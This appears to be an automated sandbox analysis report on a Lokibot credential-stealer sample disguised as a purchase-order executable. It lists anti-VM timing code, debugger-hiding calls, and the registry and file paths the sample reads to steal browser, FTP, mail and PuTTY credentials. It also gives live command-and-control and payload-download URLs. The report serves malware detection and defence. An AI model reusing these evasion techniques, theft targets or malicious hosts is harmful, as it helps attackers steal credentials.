              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 11_3_00AB818D push ss; ret 11_3_00AB8192
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F5E NtWriteVirtualMemory,0_2_02BC6F5E
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6F06 NtWriteVirtualMemory,0_2_02BC6F06
              Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
              Tries to detect Any.runShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC70A5 second address: 0000000002BC70A5 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC7263 second address: 0000000002BC7263 instructions:
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D02 second address: 0000000002BC6D02 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F0FBC787E78h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, bx 0x00000020 add edi, edx 0x00000022 cmp ax, cx 0x00000025 dec dword ptr [ebp+000000F8h] 0x0000002b cmp dword ptr [ebp+000000F8h], 00000000h 0x00000032 jne 00007F0FBC787E55h 0x00000034 nop 0x00000035 call 00007F0FBC787EAAh 0x0000003a call 00007F0FBC787E88h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000002BC6D22 second address: 0000000002BC6D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC870ADEh 0x0000001d popad 0x0000001e call 00007F0FBC87053Ah 0x00000023 lfence 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeRDTSC instruction interceptor: First address: 0000000000566D22 second address: 0000000000566D22 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F0FBC78853Eh 0x0000001d popad 0x0000001e call 00007F0FBC787F9Ah 0x00000023 lfence 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 rdtsc 0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeWindow / User API: threadDelayed 1628Jump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 6576Thread sleep count: 1628 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exe TID: 4504Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread sleep count: Count: 1628 delay: -5Jump to behavior
              Source: PO-A2174679-06.exe, 0000000B.00000002.501778520.0000000000A67000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWayer LightWeight Filter-0000
              Source: PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: PO-A2174679-06.exe, PO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

              Anti Debugging:

              barindex
              Contains functionality to hide a thread from the debuggerShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0699 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?0_2_02BC0699
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC0977 rdtsc 0_2_02BC0977
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC4291 NtSetInformationThread,LdrInitializeThunk,0_2_02BC4291
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC72EF mov eax, dword ptr fs:[00000030h]0_2_02BC72EF
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC641D mov eax, dword ptr fs:[00000030h]0_2_02BC641D
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC7604 mov eax, dword ptr fs:[00000030h]0_2_02BC7604
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC27A1 mov eax, dword ptr fs:[00000030h]0_2_02BC27A1
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC35F2 mov eax, dword ptr fs:[00000030h]0_2_02BC35F2
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC35EC mov eax, dword ptr fs:[00000030h]0_2_02BC35EC
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC1F69 mov eax, dword ptr fs:[00000030h]0_2_02BC1F69
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC6963 mov eax, dword ptr fs:[00000030h]0_2_02BC6963
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC754F mov eax, dword ptr fs:[00000030h]0_2_02BC754F
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeProcess created: C:\Users\user\Desktop\PO-A2174679-06.exe 'C:\Users\user\Desktop\PO-A2174679-06.exe' Jump to behavior
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: PO-A2174679-06.exe, 0000000B.00000002.502126875.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeCode function: 0_2_02BC36C7 cpuid 0_2_02BC36C7
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\PO-A2174679-06.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PO-A2174679-06.exe PID: 5424, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading1OS Credential Dumping2Security Software Discovery721Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23Input Capture1Virtualization/Sandbox Evasion23Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Credentials in Registry1Process Discovery1SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery323VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO-A2174679-06.exe16%VirustotalBrowse
              PO-A2174679-06.exe2%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              accessasia.com.hk0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://accessasia.com.hk/ovation/five/fre.php0%Avira URL Cloudsafe
              http://sinatrasmob.com/pro/ovation_byHOXsph232.bin0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              accessasia.com.hk
              192.185.78.145
              truetrueunknown
              onedrive.live.com
              unknown
              unknownfalse
                high
                hrf0ga.bn.files.1drv.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://accessasia.com.hk/ovation/five/fre.phptrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cdn.discordapp.com/attachments/813514912135380996/813514973141532722/ovation_byHOXsph232.binPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                    high
                    https://onedrive.live.com/nPO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                      high
                      https://onedrive.live.com/download?cid=B1076D30E2A6430F&resid=B1076D30E2A6430F%21110&authkey=AO3GCQaPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                        high
                        https://onedrive.live.com/PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                          high
